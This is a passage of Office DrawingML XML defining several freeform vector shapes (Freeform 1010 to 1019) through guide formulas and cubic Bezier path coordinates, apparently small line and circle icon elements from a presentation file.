              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D401B140-9E52-40B9-993D-47EF70B9D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1426" y="9826125"/>
              <a:ext cx="163513" cy="63500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 382 w 413"/>
                <a:gd name="T1" fmla="*/ 160 h 160"/>
                <a:gd name="T2" fmla="*/ 375 w 413"/>
                <a:gd name="T3" fmla="*/ 158 h 160"/>
                <a:gd name="T4" fmla="*/ 23 w 413"/>
                <a:gd name="T5" fmla="*/ 57 h 160"/>
                <a:gd name="T6" fmla="*/ 4 w 413"/>
                <a:gd name="T7" fmla="*/ 23 h 160"/>
                <a:gd name="T8" fmla="*/ 38 w 413"/>
                <a:gd name="T9" fmla="*/ 4 h 160"/>
                <a:gd name="T10" fmla="*/ 390 w 413"/>
                <a:gd name="T11" fmla="*/ 106 h 160"/>
                <a:gd name="T12" fmla="*/ 409 w 413"/>
                <a:gd name="T13" fmla="*/ 140 h 160"/>
                <a:gd name="T14" fmla="*/ 382 w 413"/>
                <a:gd name="T15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13" h="160">
                  <a:moveTo>
                    <a:pt x="382" y="160"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="380" y="160"/>
                    <a:pt x="377" y="159"/>
                    <a:pt x="375" y="1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8" y="53"/>
                    <a:pt x="0" y="38"/>
                    <a:pt x="4" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="9"/>
                    <a:pt x="23" y="0"/>
                    <a:pt x="38" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="106"/>
                    <a:pt x="390" y="106"/>
                    <a:pt x="390" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="404" y="110"/>
                    <a:pt x="413" y="125"/>
                    <a:pt x="409" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="405" y="152"/>
                    <a:pt x="394" y="160"/>
                    <a:pt x="382" y="1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0" name="Freeform 1010">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F30528A-05BE-47D0-80B8-F488356B3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48288" y="9686425"/>
              <a:ext cx="57150" cy="136525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 31 w 145"/>
                <a:gd name="T1" fmla="*/ 345 h 345"/>
                <a:gd name="T2" fmla="*/ 23 w 145"/>
                <a:gd name="T3" fmla="*/ 344 h 345"/>
                <a:gd name="T4" fmla="*/ 5 w 145"/>
                <a:gd name="T5" fmla="*/ 310 h 345"/>
                <a:gd name="T6" fmla="*/ 88 w 145"/>
                <a:gd name="T7" fmla="*/ 23 h 345"/>
                <a:gd name="T8" fmla="*/ 122 w 145"/>
                <a:gd name="T9" fmla="*/ 4 h 345"/>
                <a:gd name="T10" fmla="*/ 140 w 145"/>
                <a:gd name="T11" fmla="*/ 38 h 345"/>
                <a:gd name="T12" fmla="*/ 57 w 145"/>
                <a:gd name="T13" fmla="*/ 326 h 345"/>
                <a:gd name="T14" fmla="*/ 31 w 145"/>
                <a:gd name="T15" fmla="*/ 345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5" h="345">
                  <a:moveTo>
                    <a:pt x="31" y="345"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="345"/>
                    <a:pt x="26" y="345"/>
                    <a:pt x="23" y="344"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="340"/>
                    <a:pt x="0" y="325"/>
                    <a:pt x="5" y="310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92" y="9"/>
                    <a:pt x="107" y="0"/>
                    <a:pt x="122" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="9"/>
                    <a:pt x="145" y="24"/>
                    <a:pt x="140" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="326"/>
                    <a:pt x="57" y="326"/>
                    <a:pt x="57" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="337"/>
                    <a:pt x="43" y="345"/>
                    <a:pt x="31" y="3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1" name="Freeform 1011">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF296BBB-343D-465C-BF65-0885B1536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7776" y="9967412"/>
              <a:ext cx="169863" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 31 w 429"/>
                <a:gd name="T1" fmla="*/ 255 h 255"/>
                <a:gd name="T2" fmla="*/ 7 w 429"/>
                <a:gd name="T3" fmla="*/ 240 h 255"/>
                <a:gd name="T4" fmla="*/ 18 w 429"/>
                <a:gd name="T5" fmla="*/ 203 h 255"/>
                <a:gd name="T6" fmla="*/ 385 w 429"/>
                <a:gd name="T7" fmla="*/ 7 h 255"/>
                <a:gd name="T8" fmla="*/ 422 w 429"/>
                <a:gd name="T9" fmla="*/ 19 h 255"/>
                <a:gd name="T10" fmla="*/ 411 w 429"/>
                <a:gd name="T11" fmla="*/ 56 h 255"/>
                <a:gd name="T12" fmla="*/ 44 w 429"/>
                <a:gd name="T13" fmla="*/ 251 h 255"/>
                <a:gd name="T14" fmla="*/ 31 w 429"/>
                <a:gd name="T15" fmla="*/ 255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9" h="255">
                  <a:moveTo>
                    <a:pt x="31" y="255"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="255"/>
                    <a:pt x="12" y="249"/>
                    <a:pt x="7" y="240"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="227"/>
                    <a:pt x="5" y="210"/>
                    <a:pt x="18" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="385" y="7"/>
                    <a:pt x="385" y="7"/>
                    <a:pt x="385" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="0"/>
                    <a:pt x="415" y="5"/>
                    <a:pt x="422" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="429" y="32"/>
                    <a:pt x="424" y="49"/>
                    <a:pt x="411" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="251"/>
                    <a:pt x="44" y="251"/>
                    <a:pt x="44" y="251"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="254"/>
                    <a:pt x="35" y="255"/>
                    <a:pt x="31" y="2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2" name="Freeform 1012">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71313182-B6F1-4F21-8C0F-CCBBE03F77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91151" y="9964237"/>
              <a:ext cx="187325" cy="190500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 442 w 472"/>
                <a:gd name="T1" fmla="*/ 481 h 481"/>
                <a:gd name="T2" fmla="*/ 423 w 472"/>
                <a:gd name="T3" fmla="*/ 473 h 481"/>
                <a:gd name="T4" fmla="*/ 10 w 472"/>
                <a:gd name="T5" fmla="*/ 49 h 481"/>
                <a:gd name="T6" fmla="*/ 11 w 472"/>
                <a:gd name="T7" fmla="*/ 11 h 481"/>
                <a:gd name="T8" fmla="*/ 49 w 472"/>
                <a:gd name="T9" fmla="*/ 11 h 481"/>
                <a:gd name="T10" fmla="*/ 462 w 472"/>
                <a:gd name="T11" fmla="*/ 434 h 481"/>
                <a:gd name="T12" fmla="*/ 461 w 472"/>
                <a:gd name="T13" fmla="*/ 473 h 481"/>
                <a:gd name="T14" fmla="*/ 442 w 472"/>
                <a:gd name="T15" fmla="*/ 481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2" h="481">
                  <a:moveTo>
                    <a:pt x="442" y="481"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="435" y="481"/>
                    <a:pt x="428" y="478"/>
                    <a:pt x="423" y="473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0" y="38"/>
                    <a:pt x="0" y="21"/>
                    <a:pt x="11" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="0"/>
                    <a:pt x="39" y="0"/>
                    <a:pt x="49" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="462" y="434"/>
                    <a:pt x="462" y="434"/>
                    <a:pt x="462" y="434"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="472" y="445"/>
                    <a:pt x="472" y="463"/>
                    <a:pt x="461" y="473"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="456" y="478"/>
                    <a:pt x="449" y="481"/>
                    <a:pt x="442" y="4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3" name="Freeform 1013">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B234BD8B-0FB3-4748-A7F1-7A9604975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1313" y="10142037"/>
              <a:ext cx="149225" cy="42863"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 344 w 374"/>
                <a:gd name="T1" fmla="*/ 109 h 109"/>
                <a:gd name="T2" fmla="*/ 340 w 374"/>
                <a:gd name="T3" fmla="*/ 108 h 109"/>
                <a:gd name="T4" fmla="*/ 25 w 374"/>
                <a:gd name="T5" fmla="*/ 56 h 109"/>
                <a:gd name="T6" fmla="*/ 3 w 374"/>
                <a:gd name="T7" fmla="*/ 25 h 109"/>
                <a:gd name="T8" fmla="*/ 34 w 374"/>
                <a:gd name="T9" fmla="*/ 2 h 109"/>
                <a:gd name="T10" fmla="*/ 349 w 374"/>
                <a:gd name="T11" fmla="*/ 55 h 109"/>
                <a:gd name="T12" fmla="*/ 371 w 374"/>
                <a:gd name="T13" fmla="*/ 86 h 109"/>
                <a:gd name="T14" fmla="*/ 344 w 374"/>
                <a:gd name="T1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4" h="109">
                  <a:moveTo>
                    <a:pt x="344" y="109"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="343" y="109"/>
                    <a:pt x="341" y="109"/>
                    <a:pt x="340" y="108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10" y="54"/>
                    <a:pt x="0" y="40"/>
                    <a:pt x="3" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="10"/>
                    <a:pt x="19" y="0"/>
                    <a:pt x="34" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="349" y="55"/>
                    <a:pt x="349" y="55"/>
                    <a:pt x="349" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="364" y="57"/>
                    <a:pt x="374" y="71"/>
                    <a:pt x="371" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="99"/>
                    <a:pt x="357" y="109"/>
                    <a:pt x="344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4" name="Freeform 1014">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA32D913-571A-493A-B0B4-BF173F6687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51426" y="10080125"/>
              <a:ext cx="352425" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 862 w 891"/>
                <a:gd name="T1" fmla="*/ 195 h 195"/>
                <a:gd name="T2" fmla="*/ 858 w 891"/>
                <a:gd name="T3" fmla="*/ 195 h 195"/>
                <a:gd name="T4" fmla="*/ 25 w 891"/>
                <a:gd name="T5" fmla="*/ 57 h 195"/>
                <a:gd name="T6" fmla="*/ 3 w 891"/>
                <a:gd name="T7" fmla="*/ 25 h 195"/>
                <a:gd name="T8" fmla="*/ 34 w 891"/>
                <a:gd name="T9" fmla="*/ 3 h 195"/>
                <a:gd name="T10" fmla="*/ 867 w 891"/>
                <a:gd name="T11" fmla="*/ 141 h 195"/>
                <a:gd name="T12" fmla="*/ 889 w 891"/>
                <a:gd name="T13" fmla="*/ 172 h 195"/>
                <a:gd name="T14" fmla="*/ 862 w 891"/>
                <a:gd name="T15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91" h="195">
                  <a:moveTo>
                    <a:pt x="862" y="195"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="861" y="195"/>
                    <a:pt x="859" y="195"/>
                    <a:pt x="858" y="195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10" y="54"/>
                    <a:pt x="0" y="40"/>
                    <a:pt x="3" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="10"/>
                    <a:pt x="19" y="0"/>
                    <a:pt x="34" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="867" y="141"/>
                    <a:pt x="867" y="141"/>
                    <a:pt x="867" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="881" y="144"/>
                    <a:pt x="891" y="158"/>
                    <a:pt x="889" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="887" y="186"/>
                    <a:pt x="875" y="195"/>
                    <a:pt x="862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5" name="Freeform 1015">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12E0FBC8-8A69-44BE-9FDA-B6C8BA84B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03792" y="9861050"/>
              <a:ext cx="28575" cy="165100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 46 w 74"/>
                <a:gd name="T1" fmla="*/ 416 h 416"/>
                <a:gd name="T2" fmla="*/ 19 w 74"/>
                <a:gd name="T3" fmla="*/ 390 h 416"/>
                <a:gd name="T4" fmla="*/ 1 w 74"/>
                <a:gd name="T5" fmla="*/ 29 h 416"/>
                <a:gd name="T6" fmla="*/ 27 w 74"/>
                <a:gd name="T7" fmla="*/ 1 h 416"/>
                <a:gd name="T8" fmla="*/ 56 w 74"/>
                <a:gd name="T9" fmla="*/ 27 h 416"/>
                <a:gd name="T10" fmla="*/ 73 w 74"/>
                <a:gd name="T11" fmla="*/ 388 h 416"/>
                <a:gd name="T12" fmla="*/ 47 w 74"/>
                <a:gd name="T13" fmla="*/ 416 h 416"/>
                <a:gd name="T14" fmla="*/ 46 w 74"/>
                <a:gd name="T15" fmla="*/ 416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416">
                  <a:moveTo>
                    <a:pt x="46" y="416"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="416"/>
                    <a:pt x="20" y="405"/>
                    <a:pt x="19" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="29"/>
                    <a:pt x="1" y="29"/>
                    <a:pt x="1" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="14"/>
                    <a:pt x="12" y="2"/>
                    <a:pt x="27" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="0"/>
                    <a:pt x="55" y="12"/>
                    <a:pt x="56" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="388"/>
                    <a:pt x="73" y="388"/>
                    <a:pt x="73" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="403"/>
                    <a:pt x="62" y="416"/>
                    <a:pt x="47" y="416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="416"/>
                    <a:pt x="47" y="416"/>
                    <a:pt x="46" y="4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6" name="Freeform 1016">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D950AE98-18C9-45E3-BE36-F46C36ED7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1901" y="9651500"/>
              <a:ext cx="319088" cy="153988"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 31 w 805"/>
                <a:gd name="T1" fmla="*/ 392 h 392"/>
                <a:gd name="T2" fmla="*/ 6 w 805"/>
                <a:gd name="T3" fmla="*/ 376 h 392"/>
                <a:gd name="T4" fmla="*/ 20 w 805"/>
                <a:gd name="T5" fmla="*/ 340 h 392"/>
                <a:gd name="T6" fmla="*/ 763 w 805"/>
                <a:gd name="T7" fmla="*/ 6 h 392"/>
                <a:gd name="T8" fmla="*/ 799 w 805"/>
                <a:gd name="T9" fmla="*/ 20 h 392"/>
                <a:gd name="T10" fmla="*/ 786 w 805"/>
                <a:gd name="T11" fmla="*/ 56 h 392"/>
                <a:gd name="T12" fmla="*/ 42 w 805"/>
                <a:gd name="T13" fmla="*/ 390 h 392"/>
                <a:gd name="T14" fmla="*/ 31 w 805"/>
                <a:gd name="T15" fmla="*/ 392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5" h="392">
                  <a:moveTo>
                    <a:pt x="31" y="392"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="392"/>
                    <a:pt x="11" y="386"/>
                    <a:pt x="6" y="376"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="362"/>
                    <a:pt x="6" y="346"/>
                    <a:pt x="20" y="340"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="763" y="6"/>
                    <a:pt x="763" y="6"/>
                    <a:pt x="763" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="777" y="0"/>
                    <a:pt x="793" y="6"/>
                    <a:pt x="799" y="20"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="805" y="33"/>
                    <a:pt x="799" y="50"/>
                    <a:pt x="786" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="390"/>
                    <a:pt x="42" y="390"/>
                    <a:pt x="42" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="391"/>
                    <a:pt x="35" y="392"/>
                    <a:pt x="31" y="3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7" name="Freeform 1017">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00B90C39-23D5-4226-AB72-013566CDE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1313" y="9678487"/>
              <a:ext cx="192088" cy="450850"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 451 w 482"/>
                <a:gd name="T1" fmla="*/ 1141 h 1141"/>
                <a:gd name="T2" fmla="*/ 425 w 482"/>
                <a:gd name="T3" fmla="*/ 1124 h 1141"/>
                <a:gd name="T4" fmla="*/ 6 w 482"/>
                <a:gd name="T5" fmla="*/ 41 h 1141"/>
                <a:gd name="T6" fmla="*/ 21 w 482"/>
                <a:gd name="T7" fmla="*/ 5 h 1141"/>
                <a:gd name="T8" fmla="*/ 56 w 482"/>
                <a:gd name="T9" fmla="*/ 21 h 1141"/>
                <a:gd name="T10" fmla="*/ 476 w 482"/>
                <a:gd name="T11" fmla="*/ 1104 h 1141"/>
                <a:gd name="T12" fmla="*/ 460 w 482"/>
                <a:gd name="T13" fmla="*/ 1140 h 1141"/>
                <a:gd name="T14" fmla="*/ 451 w 482"/>
                <a:gd name="T15" fmla="*/ 1141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2" h="1141">
                  <a:moveTo>
                    <a:pt x="451" y="1141"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="440" y="1141"/>
                    <a:pt x="429" y="1135"/>
                    <a:pt x="425" y="1124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0" y="27"/>
                    <a:pt x="7" y="11"/>
                    <a:pt x="21" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="0"/>
                    <a:pt x="51" y="7"/>
                    <a:pt x="56" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="476" y="1104"/>
                    <a:pt x="476" y="1104"/>
                    <a:pt x="476" y="1104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="482" y="1118"/>
                    <a:pt x="475" y="1134"/>
                    <a:pt x="460" y="1140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="457" y="1141"/>
                    <a:pt x="454" y="1141"/>
                    <a:pt x="451" y="1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8" name="Freeform 1018">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80F2EF67-9175-4C22-A925-242CC64DB0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7763" y="9765800"/>
              <a:ext cx="119063" cy="117475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 151 w 302"/>
                <a:gd name="T1" fmla="*/ 298 h 298"/>
                <a:gd name="T2" fmla="*/ 141 w 302"/>
                <a:gd name="T3" fmla="*/ 297 h 298"/>
                <a:gd name="T4" fmla="*/ 17 w 302"/>
                <a:gd name="T5" fmla="*/ 211 h 298"/>
                <a:gd name="T6" fmla="*/ 14 w 302"/>
                <a:gd name="T7" fmla="*/ 99 h 298"/>
                <a:gd name="T8" fmla="*/ 91 w 302"/>
                <a:gd name="T9" fmla="*/ 17 h 298"/>
                <a:gd name="T10" fmla="*/ 203 w 302"/>
                <a:gd name="T11" fmla="*/ 14 h 298"/>
                <a:gd name="T12" fmla="*/ 285 w 302"/>
                <a:gd name="T13" fmla="*/ 91 h 298"/>
                <a:gd name="T14" fmla="*/ 288 w 302"/>
                <a:gd name="T15" fmla="*/ 203 h 298"/>
                <a:gd name="T16" fmla="*/ 211 w 302"/>
                <a:gd name="T17" fmla="*/ 285 h 298"/>
                <a:gd name="T18" fmla="*/ 151 w 302"/>
                <a:gd name="T19" fmla="*/ 298 h 298"/>
                <a:gd name="T20" fmla="*/ 151 w 302"/>
                <a:gd name="T21" fmla="*/ 59 h 298"/>
                <a:gd name="T22" fmla="*/ 113 w 302"/>
                <a:gd name="T23" fmla="*/ 67 h 298"/>
                <a:gd name="T24" fmla="*/ 65 w 302"/>
                <a:gd name="T25" fmla="*/ 118 h 298"/>
                <a:gd name="T26" fmla="*/ 67 w 302"/>
                <a:gd name="T27" fmla="*/ 189 h 298"/>
                <a:gd name="T28" fmla="*/ 145 w 302"/>
                <a:gd name="T29" fmla="*/ 243 h 298"/>
                <a:gd name="T30" fmla="*/ 189 w 302"/>
                <a:gd name="T31" fmla="*/ 235 h 298"/>
                <a:gd name="T32" fmla="*/ 237 w 302"/>
                <a:gd name="T33" fmla="*/ 184 h 298"/>
                <a:gd name="T34" fmla="*/ 235 w 302"/>
                <a:gd name="T35" fmla="*/ 113 h 298"/>
                <a:gd name="T36" fmla="*/ 184 w 302"/>
                <a:gd name="T37" fmla="*/ 65 h 298"/>
                <a:gd name="T38" fmla="*/ 151 w 302"/>
                <a:gd name="T39" fmla="*/ 5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2" h="298">
                  <a:moveTo>
                    <a:pt x="151" y="298"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="298"/>
                    <a:pt x="145" y="298"/>
                    <a:pt x="141" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="294"/>
                    <a:pt x="40" y="261"/>
                    <a:pt x="17" y="211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="175"/>
                    <a:pt x="0" y="136"/>
                    <a:pt x="14" y="99"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="62"/>
                    <a:pt x="55" y="33"/>
                    <a:pt x="91" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="1"/>
                    <a:pt x="167" y="0"/>
                    <a:pt x="203" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="28"/>
                    <a:pt x="269" y="55"/>
                    <a:pt x="285" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="127"/>
                    <a:pt x="302" y="167"/>
                    <a:pt x="288" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="274" y="240"/>
                    <a:pt x="247" y="269"/>
                    <a:pt x="211" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="293"/>
                    <a:pt x="172" y="298"/>
                    <a:pt x="151" y="298"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="151" y="59"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="59"/>
                    <a:pt x="125" y="62"/>
                    <a:pt x="113" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="77"/>
                    <a:pt x="74" y="95"/>
                    <a:pt x="65" y="118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="141"/>
                    <a:pt x="57" y="166"/>
                    <a:pt x="67" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="220"/>
                    <a:pt x="111" y="241"/>
                    <a:pt x="145" y="243"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="244"/>
                    <a:pt x="175" y="241"/>
                    <a:pt x="189" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="225"/>
                    <a:pt x="228" y="207"/>
                    <a:pt x="237" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="161"/>
                    <a:pt x="245" y="136"/>
                    <a:pt x="235" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="91"/>
                    <a:pt x="207" y="74"/>
                    <a:pt x="184" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="61"/>
                    <a:pt x="162" y="59"/>
                    <a:pt x="151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69" name="Freeform 1019">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{496D2FE8-576A-4836-A8A1-3FDC9DD2C5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656176" y="10007100"/>
              <a:ext cx="131763" cy="117475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 167 w 333"/>
                <a:gd name="T1" fmla="*/ 297 h 297"/>
                <a:gd name="T2" fmla="*/ 115 w 333"/>
                <a:gd name="T3" fmla="*/ 288 h 297"/>
                <a:gd name="T4" fmla="*/ 33 w 333"/>
                <a:gd name="T5" fmla="*/ 211 h 297"/>
                <a:gd name="T6" fmla="*/ 107 w 333"/>
                <a:gd name="T7" fmla="*/ 17 h 297"/>
                <a:gd name="T8" fmla="*/ 219 w 333"/>
                <a:gd name="T9" fmla="*/ 14 h 297"/>
                <a:gd name="T10" fmla="*/ 300 w 333"/>
                <a:gd name="T11" fmla="*/ 91 h 297"/>
                <a:gd name="T12" fmla="*/ 300 w 333"/>
                <a:gd name="T13" fmla="*/ 91 h 297"/>
                <a:gd name="T14" fmla="*/ 227 w 333"/>
                <a:gd name="T15" fmla="*/ 284 h 297"/>
                <a:gd name="T16" fmla="*/ 167 w 333"/>
                <a:gd name="T17" fmla="*/ 297 h 297"/>
                <a:gd name="T18" fmla="*/ 166 w 333"/>
                <a:gd name="T19" fmla="*/ 59 h 297"/>
                <a:gd name="T20" fmla="*/ 129 w 333"/>
                <a:gd name="T21" fmla="*/ 67 h 297"/>
                <a:gd name="T22" fmla="*/ 83 w 333"/>
                <a:gd name="T23" fmla="*/ 188 h 297"/>
                <a:gd name="T24" fmla="*/ 134 w 333"/>
                <a:gd name="T25" fmla="*/ 237 h 297"/>
                <a:gd name="T26" fmla="*/ 204 w 333"/>
                <a:gd name="T27" fmla="*/ 234 h 297"/>
                <a:gd name="T28" fmla="*/ 250 w 333"/>
                <a:gd name="T29" fmla="*/ 113 h 297"/>
                <a:gd name="T30" fmla="*/ 166 w 333"/>
                <a:gd name="T31" fmla="*/ 59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33" h="297">
                  <a:moveTo>
                    <a:pt x="167" y="297"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="297"/>
                    <a:pt x="131" y="294"/>
                    <a:pt x="115" y="288"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="274"/>
                    <a:pt x="49" y="246"/>
                    <a:pt x="33" y="211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="137"/>
                    <a:pt x="33" y="50"/>
                    <a:pt x="107" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="1"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="219" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="255" y="28"/>
                    <a:pt x="284" y="55"/>
                    <a:pt x="300" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="300" y="91"/>
                    <a:pt x="300" y="91"/>
                    <a:pt x="300" y="91"/>
